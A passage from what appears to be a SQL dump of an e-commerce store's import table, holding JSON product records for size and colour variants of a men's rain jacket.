ull,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"296\":{\"sku\":\"MJ09-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-M-Yellow\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj09-yellow_alt1.jpg,\\/m\\/j\\/mj09-yellow_back.jpg\",\"image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj09-yellow_alt1.jpg,\\/m\\/j\\/mj09-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"297\":{\"sku\":\"MJ09-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-L-Blue\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"298\":{\"sku\":\"MJ09-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-L-White\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"299\":{\"sku\":\"MJ09-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-L-Yellow\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj09-yellow_alt1.jpg,\\/m\\/j\\/mj09-yellow_back.jpg\",\"image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj09-yellow_alt1.jpg,\\/m\\/j\\/mj09-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(4, 'catalog_product', 'append', '{\"300\":{\"sku\":\"MJ09-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-XL-Blue\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"301\":{\"sku\":\"MJ09-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-XL-White\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"302\":{\"sku\":\"MJ09-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-XL-Yellow\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj09-yellow_alt1.jpg,\\/m\\/j\\/mj09-yellow_back.jpg\",\"image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj09-yellow_alt1.jpg,\\/m\\/j\\/mj09-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"303\":{\"sku\":\"MJ09\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Jacket|Lightweight|Rain Coat|Windbreaker|&frac14; zip,material=Cocona&reg; performance fabric|Lycra&reg;|Polyester,pattern=Solid,climate=Cool|Mild|Rainy|Spring|Windy,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MJ09-XS-Blue,size=XS,color=Blue|sku=MJ09-XS-White,size=XS,color=White|sku=MJ09-XS-Yellow,size=XS,color=Yellow|sku=MJ09-S-Blue,size=S,color=Blue|sku=MJ09-S-White,size=S,color=White|sku=MJ09-S-Yellow,size=S,color=Yellow|sku=MJ09-M-Blue,size=M,color=Blue|sku=MJ09-M-White,size=M,color=White|sku=MJ09-M-Yellow,size=M,color=Yellow|sku=MJ09-L-Blue,size=L,color=Blue|sku=MJ09-L-White,size=L,color=White|sku=MJ09-L-Yellow,size=L,color=Yellow|sku=MJ09-XL-Blue,size=XL,color=Blue|sku=MJ09-XL-White,size=XL,color=White|sku=MJ09-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj09-yellow_alt1.jpg,\\/m\\/j\\/mj09-yellow_back.jpg\",\"image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj09-yellow_alt1.jpg,\\/m\\/j\\/mj09-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Jacket|Lightweight|Rain Coat|Windbreaker|&frac14; zip\",\"material\":\"Cocona&reg; performance fabric|Lycra&reg;|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Cool|Mild|Rainy|Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"304\":{\"sku\":\"MJ10-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Mars HeatTech&trade; 